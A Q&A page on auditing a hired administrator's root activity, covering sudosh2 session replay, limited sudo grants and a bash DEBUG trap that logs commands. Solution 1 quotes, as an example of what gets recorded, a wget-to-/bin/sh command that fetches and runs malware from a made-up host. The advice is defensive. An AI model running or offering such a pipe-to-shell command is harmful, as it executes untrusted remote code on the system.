Log every command executed from root
I want to give access to my root server to an external system administrator, but i want to be sure to double check what he is doing to my server, e.g. copying data i don't want them to do and so on. I would also like to take a track of whatever file is accessed, even in read only and not edited.
How can i do that?
Solution 1:
Trust, but verify!
Check out sudosh2. sudosh2 is provided by FreeBSD ports. Packages are available for RedHat and Ubuntu. Here is the description from their website:
sudosh is an auditing shell filter and can be used as a login shell. Sudosh records all keystrokes and output and can play back the session as just like a VCR.
Sudosh will allow you to replay the user's session, which will allow you to see all input and output as the user saw it. You see everything, keystrokes, typos, backspaces, what did they edit in vi
, the output of wget -O- http://zyxzyxzyxzyx.ru/haxor/malware | /bin/sh
, etc.
It's possible to send sudosh logs to syslog, so that they can be stored on a central syslog server away from the system.
Note that sudosh2 is a replacement for sudosh, which was abandoned by it's author
Do you work at an academic institution where users insist on having superuser privledges? Or do you work at a corporation and want to allow users to have superuser privileges on their own VMs? This might be the solution for you.
Solution 2:
Don't give him root access. Instead, give him an un-privileged user account and request that he do all of his work through sudo
, which will log all of his commands.
Keep in mind that if this person has ill intentions and you give him full sudo privileges, he will find a way to carry out those ill intentions without those commands being logged. In this case, only grant him access to the specific commands he needs to do his job.
Solution 3:
I'm not familiar with sudosh2, but I put the following in my .bashrc
to log all the commands I type in a bash
shell to the file ~/.command_log
:
# log every command typed and when
if [ -n "${BASH_VERSION}" ]; then
trap "caller >/dev/null || \
printf '%s\\n' \"\$(date '+%Y-%m-%dT%H:%M:%S%z')\
\$(tty) \${BASH_COMMAND}\" 2>/dev/null >>~/.command_log" DEBUG
fi
The above sets a trap on DEBUG
, which is executed just before an ordinary command is executed. The caller
built-in is used to test whether the command is being typed at an interactive shell or run via something like .bashrc
. The value ${BASH_COMMAND}
contains the command currently being executed.